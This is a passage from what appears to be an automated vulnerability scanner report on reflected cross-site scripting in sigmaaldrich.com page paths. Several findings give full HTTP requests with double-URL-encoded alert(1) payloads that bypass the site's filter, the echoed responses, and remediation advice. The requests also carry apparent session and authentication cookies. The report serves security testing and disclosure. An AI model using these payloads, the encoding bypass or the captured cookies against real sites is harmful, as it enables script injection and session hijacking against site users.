Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:39 GMT
Content-Length: 28972
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-sciencec1223";alert(1)//822b16cc94e/functional-genomics-and-rnai/shrna-library-details.html","E404") ;
   </script>
...[SNIP]...

1.544. http://www.sigmaaldrich.com/life-science/functional-genomics-and-rnai/shrna-library-details.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/functional-genomics-and-rnai/shrna-library-details.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload abddc%2522%253balert%25281%2529%252f%252f54e2a65fd2d was submitted in the REST URL parameter 2. This input was echoed as abddc";alert(1)//54e2a65fd2d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science/functional-genomics-and-rnaiabddc%2522%253balert%25281%2529%252f%252f54e2a65fd2d/shrna-library-details.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:41 GMT
Content-Length: 28972
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science/functional-genomics-and-rnaiabddc";alert(1)//54e2a65fd2d/shrna-library-details.html","E404") ;
   </script>
...[SNIP]...

1.545. http://www.sigmaaldrich.com/life-science/functional-genomics-and-rnai/shrna-library-details.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/functional-genomics-and-rnai/shrna-library-details.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 494e6%2522%253balert%25281%2529%252f%252fcf8cd620e84 was submitted in the REST URL parameter 3. This input was echoed as 494e6";alert(1)//cf8cd620e84 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science/functional-genomics-and-rnai/494e6%2522%253balert%25281%2529%252f%252fcf8cd620e84 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:42 GMT
Content-Length: 28946
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science/functional-genomics-and-rnai/494e6";alert(1)//cf8cd620e84","E404") ;
   </script>
...[SNIP]...

1.546. http://www.sigmaaldrich.com/life-science/functional-genomics-and-rnai/shrna/custom-services.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/functional-genomics-and-rnai/shrna/custom-services.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 37c26%2522%253balert%25281%2529%252f%252f892a908b416 was submitted in the REST URL parameter 1. This input was echoed as 37c26";alert(1)//892a908b416 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science37c26%2522%253balert%25281%2529%252f%252f892a908b416/functional-genomics-and-rnai/shrna/custom-services.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:41 GMT
Content-Length: 28972
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science37c26";alert(1)//892a908b416/functional-genomics-and-rnai/shrna/custom-services.html","E404") ;
   </script>
...[SNIP]...

1.547. http://www.sigmaaldrich.com/life-science/functional-genomics-and-rnai/shrna/custom-services.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/functional-genomics-and-rnai/shrna/custom-services.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload de110%2522%253balert%25281%2529%252f%252f4b474075c61 was submitted in the REST URL parameter 2. This input was echoed as de110";alert(1)//4b474075c61 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science/functional-genomics-and-rnaide110%2522%253balert%25281%2529%252f%252f4b474075c61/shrna/custom-services.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:43 GMT
Content-Length: 28972
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science/functional-genomics-and-rnaide110";alert(1)//4b474075c61/shrna/custom-services.html","E404") ;
   </script>
...[SNIP]...

1.548. http://www.sigmaaldrich.com/life-science/functional-genomics-and-rnai/shrna/custom-services.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/functional-genomics-and-rnai/shrna/custom-services.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75d2e%2522%253balert%25281%2529%252f%252ffebfb9718bc was submitted in the REST URL parameter 3. This input was echoed as 75d2e";alert(1)//febfb9718bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science/functional-genomics-and-rnai/shrna75d2e%2522%253balert%25281%2529%252f%252ffebfb9718bc/custom-services.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
